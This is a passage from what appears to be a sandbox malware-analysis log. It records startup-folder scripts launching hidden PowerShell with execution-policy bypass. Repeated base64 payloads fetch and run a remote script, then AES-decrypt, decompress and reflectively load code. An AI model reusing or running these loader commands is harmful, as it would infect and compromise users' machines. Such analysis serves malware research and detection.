XR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibrzgf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygntwrnu20vqurpdmu2bwfpr0ivnhvly1nunct5ctlmcdnschratkz4afbsbz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnumfncfvzrkg0t1v2l3r0nwowbedwzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibpbgd5zsgkcgfyyw1fdmfykxsjsuvyicckanloaxg9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckynjlz3c9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyr2d3rzdz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fc